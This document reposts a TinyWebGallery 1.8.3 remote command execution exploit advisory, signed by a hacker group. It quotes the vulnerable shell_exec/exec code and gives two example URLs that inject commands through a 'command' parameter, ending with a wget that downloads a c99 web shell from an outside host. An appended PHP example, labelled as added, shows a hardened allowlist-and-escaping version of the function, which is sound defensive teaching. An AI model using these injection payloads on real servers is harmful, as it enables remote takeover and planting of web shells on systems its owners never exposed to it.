Source: 自学PHP网 | Time: 2015-04-17 13:03
<======================================================>
[»] TinyWebGallery 1.8.3 Remote Command Execution
<======================================================>
Author: Expl0!Ts
--------> My Best t34m -----> "BaC , RoBert MilEs , Bl4ck_ID"
Software URL: http://www.tinywebgallery.com/dl.php?file=twg_latest
Tested on: Windows XP
!----- > THnKs T0 My ALLAH
<::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::>
bIG tHnkS T0 :-> vbspiders.com & Dz4all.com www.2cto.com & isecur1ty.org
<::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::>
<=================Test====================>

-=[ vuln c0de ]=- 1

1) --------------> filefunctions.inc :

function execute_command ($command) {
    global $use_shell_exec;
    ob_start();
    set_error_handler("on_error_no_output");
    if (substr(@php_uname(), 0, 7) == "Windows"){
        // Make a new instance of the COM object
        $WshShell = new COM("WScript.Shell");
        // Make the command window but dont show it.
        $oExec = $WshShell->Run("cmd /C " . $command, 0, true);
    } else {
        if ($use_shell_exec) {
            shell_exec($command); <--------------------------------------------- error

1) ---------> Example: http://www.2cto.com /(patch)/inc/filefunctions.inc?command=<id>;<pwd>;<wget http://shell.org/c99.zip>

-=[ vuln c0de ]=- 2

2) --------------> info.php :

if ($use_shell_exec) {
    shell_exec($command);
} else {
    exec($command . " > /dev/null"); <------------------------------------------ error

2) ---------> Example: http://www.2cto.com /(patch)/info.php?command=<id>;<pwd>;<wget http://shell.org/c99.zip>

<------------------------------------------------------------------------------------------------------------------------------------------------------------------->
Thanks to: !> BaC ,!> Black_ID ,!> Kala$nikoV ,!> Robert miles ,!> Dr.Black_ID , !> AHmEd-HaMaImi , Bel-AiSa , To-KhAlEd
<------------------------------------------------------------------------------------------------------------------------------------------------------------------->
EnJoY o_O
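A hardened counterpart to the execute_command() excerpt in the advisory, as an added example that is not TinyWebGallery code: the caller may select only an allowlisted operation and a file inside one directory, and every token is quoted before it reaches a shell. The operation table, build_command() and the demo paths are hypothetical, and the demo input is constructed.

```php
<?php
declare(strict_types=1);
// Added example, not TinyWebGallery code. All names below are hypothetical.

// Operation key => fixed argv prefix. Request input can only pick a key.
const ALLOWED_OPERATIONS = [
    'checksum' => ['sha256sum'],
    'filetype' => ['file', '--brief'],
];

// Build a command line from an allowlisted operation and one file that must
// resolve inside $baseDir. Nothing from the request is used as command text.
function build_command(string $operation, string $file, string $baseDir): string
{
    if (!array_key_exists($operation, ALLOWED_OPERATIONS)) {
        throw new InvalidArgumentException('operation not allowed');
    }
    $base = realpath($baseDir);
    $real = realpath($file);   // resolves ../ and symlinks before the check
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('file outside allowed directory');
    }
    // escapeshellarg() quotes each token so ; | & $() stay literal data.
    $argv = array_merge(ALLOWED_OPERATIONS[$operation], [$real]);
    return implode(' ', array_map('escapeshellarg', $argv));
}

// Constructed demo input: a temp directory standing in for the gallery folder.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gallery_demo_' . getmypid();
@mkdir($dir);
$file = $dir . DIRECTORY_SEPARATOR . 'a;id.jpg';   // legal name with a metacharacter
file_put_contents($file, 'x');

// The semicolon in the file name stays inside the quoted argument.
echo build_command('checksum', $file, $dir), PHP_EOL;

// Strings shaped like the advisory's command parameter are not valid keys.
foreach (['id;pwd', 'checksum;id'] as $bad) {
    try {
        build_command($bad, $file, $dir);
    } catch (InvalidArgumentException $e) {
        echo "rejected '$bad': ", $e->getMessage(), PHP_EOL;
    }
}

unlink($file);
rmdir($dir);
```

On PHP 7.4 and later, passing the argv array directly to proc_open() avoids the shell altogether, which removes the dependence on quoting.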